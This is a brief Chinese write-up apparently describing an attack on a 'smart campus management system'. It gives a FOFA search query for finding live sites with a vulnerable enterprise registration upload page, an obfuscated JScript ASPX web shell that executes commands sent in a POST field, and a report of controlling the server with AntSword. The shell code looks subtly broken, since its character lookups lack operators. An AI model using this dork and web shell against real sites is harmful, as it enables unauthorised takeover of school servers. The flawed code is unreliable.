前言
智慧校园管理系统前台注册页面存在文件上传,由于没有对上传的文件进行审查导致可上传恶意文件控制服务器
操作过程
老规矩,fofa采集工具上先对其收集一波
fofa语法:body="DC_Login/QYSignUp"
找到其中一个疑似可利用的目标站点(带有企业用户注册功能的站点
点击企业用户注册便可发现可对其进行任意文件上传
这里我们上传aspx?并且上传后它还能回显对应位置
附上aspx?
代码语言:javascript复制<%@ Page Language="Jscript" Debug=true%>
<%
var AUXR='DQjiUYyXzAbVMPNsJLrlfRmughGESdKHkpawFTWICnBtoxeZqvOc';
var OIWN=Request.Form("PleasedaidaiHarvey");
var JZLF=AUXR(4) AUXR(14) AUXR(15) AUXR(9) AUXR(20) AUXR(27);
eval(OIWN, JZLF);
%>
最后蚁剑成功连上